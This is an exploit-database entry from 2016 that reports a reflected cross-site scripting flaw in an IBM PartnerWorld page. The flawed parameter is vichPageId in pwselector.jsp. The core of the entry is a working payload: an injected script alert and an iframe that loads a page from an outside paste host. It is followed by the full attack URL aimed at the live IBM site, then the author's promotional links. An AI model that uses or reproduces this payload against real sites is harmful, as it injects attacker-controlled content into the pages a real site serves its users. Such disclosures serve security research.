IBM Security Website suffers from a cross site scripting vulnerability.
846d370ff13e8398291aa05fee5121ddefbf1cda285f7149ac3bc961505df56a# Exploit Title: IBM Security WebSite Cross-Site Scripting
# Google Dork: N/A
# Date: 2016/2/5
# Exploit Author: RootByte
# Vendor Homepage: www.ibm.com/security/
# Software Link: N/A
# Version: N/A
# Tested on: Windows 10 / FireFox 44.0
# CVE : N/A
~ # about (Wikipedia):
International Business Machines Corporation (commonly referred to as IBM) is an American multinational technology and consulting corporation, with corporate headquarters in Armonk, New York. IBM manufactures and markets computer hardware, middleware and software, and offers infrastructure, hosting and consulting services in areas ranging from mainframe computers to nanotechnology.
# POC:
~ # Vulnerable Location: http://www-03.ibm.com/partnerworld/wps/
File: pwselector.jsp
~ # Variable: vichPageId
~ # Using this script for XSS Vunerability Testing:
"><script>alert('XSSPOSED')</script><center>RootByte<br><iframe src="http://paste.c99.nl/5c4fd8e6432edd5879dd.html" width="800" height="600"</iframe></center>
~ # Our Finally address is:
http://www-03.ibm.com/partnerworld/wps/pwselector.jsp?CS=yes&vichPageId="><script>alert('XSSPOSED')</script><center>RootByte<br><iframe src="http://paste.c99.nl/5c4fd8e6432edd5879dd.html" width="800" height="600"</iframe></center>
# Discovered by: RootByte
# FanPage: https://www.facebook.com/Rootbyte/
# FB Group: https://www.facebook.com/groups/RootByte/
# Twitter: https://twitter.com/rootbytemx
InfoSec Consultant / Web Pentester / Wannabe Security Researcher / JDM interested and Tacos addicted.
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed